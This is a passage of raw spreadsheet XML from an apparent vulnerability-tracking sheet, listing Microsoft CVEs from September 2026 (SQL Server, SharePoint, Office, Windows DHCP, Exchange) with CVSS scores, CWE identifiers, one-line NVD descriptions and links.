t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K121" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L121" s="5" t="inlineStr" /><c r="M121" s="5" t="inlineStr" /><c r="N121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P121" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q121" s="5" t="inlineStr" /><c r="R121" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S121" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t></is></c></row><row r="122"><c r="A122" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C122" s="5" t="inlineStr"><is><t>CVE-2026-67380</t></is></c><c r="D122" s="5" t="n"><v>8.800000000000001</v></c><c r="E122" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G122" s="5" t="inlineStr" /><c r="H122" s="5" t="n"><v>0.007</v></c><c r="I122" s="5" t="inlineStr" /><c r="J122" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K122" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L122" s="5" t="inlineStr" /><c r="M122" s="5" t="inlineStr" /><c r="N122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P122" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q122" s="5" t="inlineStr" /><c r="R122" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S122" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t></is></c></row><row r="123"><c r="A123" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C123" s="5" t="inlineStr"><is><t>CVE-2026-67381</t></is></c><c r="D123" s="5" t="n"><v>8.800000000000001</v></c><c r="E123" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G123" s="5" t="inlineStr" /><c r="H123" s="5" t="n"><v>0.005</v></c><c r="I123" s="5" t="inlineStr" /><c r="J123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L123" s="5" t="inlineStr" /><c r="M123" s="5" t="inlineStr" /><c r="N123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P123" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q123" s="5" t="inlineStr" /><c r="R123" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S123" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t></is></c></row><row r="124"><c r="A124" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C124" s="5" t="inlineStr"><is><t>CVE-2026-67384</t></is></c><c r="D124" s="5" t="n"><v>8.800000000000001</v></c><c r="E124" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G124" s="5" t="inlineStr" /><c r="H124" s="5" t="n"><v>0.006</v></c><c r="I124" s="5" t="inlineStr" /><c r="J124" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K124" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L124" s="5" t="inlineStr" /><c r="M124" s="5" t="inlineStr" /><c r="N124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P124" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q124" s="5" t="inlineStr" /><c r="R124" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S124" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t></is></c></row><row r="125"><c r="A125" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C125" s="5" t="inlineStr"><is><t>CVE-2026-67385</t></is></c><c r="D125" s="5" t="n"><v>8.800000000000001</v></c><c r="E125" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F125" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G125" s="5" t="inlineStr" /><c r="H125" s="5" t="n"><v>0.005</v></c><c r="I125" s="5" t="inlineStr" /><c r="J125" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K125" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L125" s="5" t="inlineStr" /><c r="M125" s="5" t="inlineStr" /><c r="N125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P125" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q125" s="5" t="inlineStr" /><c r="R125" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S125" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t></is></c></row><row r="126"><c r="A126" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C126" s="5" t="inlineStr"><is><t>CVE-2026-67388</t></is></c><c r="D126" s="5" t="n"><v>8.800000000000001</v></c><c r="E126" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F126" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G126" s="5" t="inlineStr" /><c r="H126" s="5" t="n"><v>0.005</v></c><c r="I126" s="5" t="inlineStr" /><c r="J126" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K126" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L126" s="5" t="inlineStr" /><c r="M126" s="5" t="inlineStr" /><c r="N126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P126" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q126" s="5" t="inlineStr" /><c r="R126" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S126" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t></is></c></row><row r="127"><c r="A127" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C127" s="5" t="inlineStr"><is><t>CVE-2026-67638</t></is></c><c r="D127" s="5" t="n"><v>8.800000000000001</v></c><c r="E127" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G127" s="5" t="inlineStr" /><c r="H127" s="5" t="n"><v>0.007</v></c><c r="I127" s="5" t="inlineStr" /><c r="J127" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K127" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L127" s="5" t="inlineStr" /><c r="M127" s="5" t="inlineStr" /><c r="N127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P127" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q127" s="5" t="inlineStr" /><c r="R127" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S127" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t></is></c></row><row r="128"><c r="A128" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C128" s="5" t="inlineStr"><is><t>CVE-2026-67639</t></is></c><c r="D128" s="5" t="n"><v>8.800000000000001</v></c><c r="E128" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G128" s="5" t="inlineStr" /><c r="H128" s="5" t="n"><v>0.007</v></c><c r="I128" s="5" t="inlineStr" /><c r="J128" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K128" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L128" s="5" t="inlineStr" /><c r="M128" s="5" t="inlineStr" /><c r="N128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P128" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q128" s="5" t="inlineStr" /><c r="R128" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S128" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t></is></c></row><row r="129"><c r="A129" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C129" s="5" t="inlineStr"><is><t>CVE-2026-67642</t></is></c><c r="D129" s="5" t="n"><v>8.800000000000001</v></c><c r="E129" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G129" s="5" t="inlineStr" /><c r="H129" s="5" t="n"><v>0.005</v></c><c r="I129" s="5" t="inlineStr" /><c r="J129" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K129" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L129" s="5" t="inlineStr" /><c r="M129" s="5" t="inlineStr" /><c r="N129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P129" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q129" s="5" t="inlineStr" /><c r="R129" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S129" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t></is></c></row><row r="130"><c r="A130" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C130" s="5" t="inlineStr"><is><t>CVE-2026-68775</t></is></c><c r="D130" s="5" t="n"><v>8.800000000000001</v></c><c r="E130" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G130" s="5" t="inlineStr" /><c r="H130" s="5" t="n"><v>0.005</v></c><c r="I130" s="5" t="inlineStr" /><c r="J130" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K130" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L130" s="5" t="inlineStr" /><c r="M130" s="5" t="inlineStr" /><c r="N130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P130" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q130" s="5" t="inlineStr" /><c r="R130" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S130" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t></is></c></row><row r="131"><c r="A131" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C131" s="5" t="inlineStr"><is><t>CVE-2026-68786</t></is></c><c r="D131" s="5" t="n"><v>8.800000000000001</v></c><c r="E131" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G131" s="5" t="inlineStr" /><c r="H131" s="5" t="n"><v>0.005</v></c><c r="I131" s="5" t="inlineStr" /><c r="J131" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K131" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L131" s="5" t="inlineStr" /><c r="M131" s="5" t="inlineStr" /><c r="N131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P131" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q131" s="5" t="inlineStr" /><c r="R131" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S131" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t></is></c></row><row r="132"><c r="A132" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C132" s="5" t="inlineStr"><is><t>CVE-2026-68828</t></is></c><c r="D132" s="5" t="n"><v>8.800000000000001</v></c><c r="E132" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G132" s="5" t="inlineStr" /><c r="H132" s="5" t="n"><v>0.004</v></c><c r="I132" s="5" t="inlineStr" /><c r="J132" s="5" t="inlineStr" /><c r="K132" s="5" t="inlineStr" /><c r="L132" s="5" t="inlineStr" /><c r="M132" s="5" t="inlineStr" /><c r="N132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P132" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q132" s="5" t="inlineStr" /><c r="R132" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S132" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t></is></c></row><row r="133"><c r="A133" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C133" s="5" t="inlineStr"><is><t>CVE-2026-69266</t></is></c><c r="D133" s="5" t="n"><v>8.800000000000001</v></c><c r="E133" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G133" s="5" t="inlineStr" /><c r="H133" s="5" t="n"><v>0.004</v></c><c r="I133" s="5" t="inlineStr" /><c r="J133" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K133" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L133" s="5" t="inlineStr" /><c r="M133" s="5" t="inlineStr" /><c r="N133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P133" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q133" s="5" t="inlineStr" /><c r="R133" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S133" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t></is></c></row><row r="134"><c r="A134" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C134" s="5" t="inlineStr"><is><t>CVE-2026-69268</t></is></c><c r="D134" s="5" t="n"><v>8.800000000000001</v></c><c r="E134" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G134" s="5" t="inlineStr" /><c r="H134" s="5" t="n"><v>0.007</v></c><c r="I134" s="5" t="inlineStr" /><c r="J134" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K134" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L134" s="5" t="inlineStr" /><c r="M134" s="5" t="inlineStr" /><c r="N134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P134" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q134" s="5" t="inlineStr" /><c r="R134" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S134" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t></is></c></row><row r="135"><c r="A135" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C135" s="5" t="inlineStr"><is><t>CVE-2026-69273</t></is></c><c r="D135" s="5" t="n"><v>8.800000000000001</v></c><c r="E135" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G135" s="5" t="inlineStr" /><c r="H135" s="5" t="n"><v>0.005</v></c><c r="I135" s="5" t="inlineStr" /><c r="J135" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K135" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L135" s="5" t="inlineStr" /><c r="M135" s="5" t="inlineStr" /><c r="N135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P135" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q135" s="5" t="inlineStr" /><c r="R135" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S135" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t></is></c></row><row r="136"><c r="A136" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C136" s="5" t="inlineStr"><is><t>CVE-2026-69282</t></is></c><c r="D136" s="5" t="n"><v>8.800000000000001</v></c><c r="E136" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F136" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G136" s="5" t="inlineStr" /><c r="H136" s="5" t="n"><v>0.005</v></c><c r="I136" s="5" t="inlineStr" /><c r="J136" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K136" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L136" s="5" t="inlineStr" /><c r="M136" s="5" t="inlineStr" /><c r="N136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P136" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q136" s="5" t="inlineStr" /><c r="R136" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S136" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t></is></c></row><row r="137"><c r="A137" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C137" s="5" t="inlineStr"><is><t>CVE-2026-69285</t></is></c><c r="D137" s="5" t="n"><v>8.800000000000001</v></c><c r="E137" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F137" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G137" s="5" t="inlineStr" /><c r="H137" s="5" t="n"><v>0.006</v></c><c r="I137" s="5" t="inlineStr" /><c r="J137" s="5" t="inlineStr" /><c r="K137" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L137" s="5" t="inlineStr" /><c r="M137" s="5" t="inlineStr" /><c r="N137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P137" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q137" s="5" t="inlineStr" /><c r="R137" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S137" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t></is></c></row><row r="138"><c r="A138" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C138" s="5" t="inlineStr"><is><t>CVE-2026-69291</t></is></c><c r="D138" s="5" t="n"><v>8.800000000000001</v></c><c r="E138" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F138" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G138" s="5" t="inlineStr" /><c r="H138" s="5" t="n"><v>0.006</v></c><c r="I138" s="5" t="inlineStr" /><c r="J138" s="5" t="inlineStr" /><c r="K138" s="5" t="inlineStr" /><c r="L138" s="5" t="inlineStr" /><c r="M138" s="5" t="inlineStr" /><c r="N138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P138" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q138" s="5" t="inlineStr" /><c r="R138" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S138" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t></is></c></row><row r="139"><c r="A139" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C139" s="5" t="inlineStr"><is><t>CVE-2026-69334</t></is></c><c r="D139" s="5" t="n"><v>8.800000000000001</v></c><c r="E139" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G139" s="5" t="inlineStr" /><c r="H139" s="5" t="n"><v>0.008</v></c><c r="I139" s="5" t="inlineStr" /><c r="J139" s="5" t="inlineStr" /><c r="K139" s="5" t="inlineStr" /><c r="L139" s="5" t="inlineStr" /><c r="M139" s="5" t="inlineStr" /><c r="N139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q139" s="5" t="inlineStr" /><c r="R139" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S139" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t></is></c></row><row r="140"><c r="A140" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C140" s="5" t="inlineStr"><is><t>CVE-2026-69355</t></is></c><c r="D140" s="5" t="n"><v>8.800000000000001</v></c><c r="E140" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G140" s="5" t="inlineStr" /><c r="H140" s="5" t="n"><v>0.008</v></c><c r="I140" s="5" t="inlineStr" /><c r="J140" s="5" t="inlineStr" /><c r="K140" s="5" t="inlineStr" /><c r="L140" s="5" t="inlineStr" /><c r="M140" s="5" t="inlineStr" /><c r="N140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P140" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q140" s="5" t="inlineStr" /><c r="R140" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S140" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t></is></c></row><row r="141"><c r="A141" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C141" s="5" t="inlineStr"><is><t>CVE-2026-69360</t></is></c><c r="D141" s="5" t="n"><v>8.800000000000001</v></c><c r="E141" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G141" s="5" t="inlineStr" /><c r="H141" s="5" t="n"><v>0.008</v></c><c r="I141" s="5" t="inlineStr" /><c r="J141" s="5" t="inlineStr" /><c r="K141" s="5" t="inlineStr" /><c r="L141" s="5" t="inlineStr" /><c r="M141" s="5" t="inlineStr" /><c r="N141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P141" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q141" s="5" t="inlineStr" /><c r="R141" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S141" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t></is></c></row><row r="142"><c r="A142" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C142" s="5" t="inlineStr"><is><t>CVE-2026-69386</t></is></c><c r="D142" s="5" t="n"><v>8.800000000000001</v></c><c r="E142" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G142" s="5" t="inlineStr" /><c r="H142" s="5" t="n"><v>0.008</v></c><c r="I142" s="5" t="inlineStr" /><c r="J142" s="5" t="inlineStr" /><c r="K142" s="5" t="inlineStr" /><c r="L142" s="5" t="inlineStr" /><c r="M142" s="5" t="inlineStr" /><c r="N142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P142" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q142" s="5" t="inlineStr" /><c r="R142" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S142" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T142" s="6" 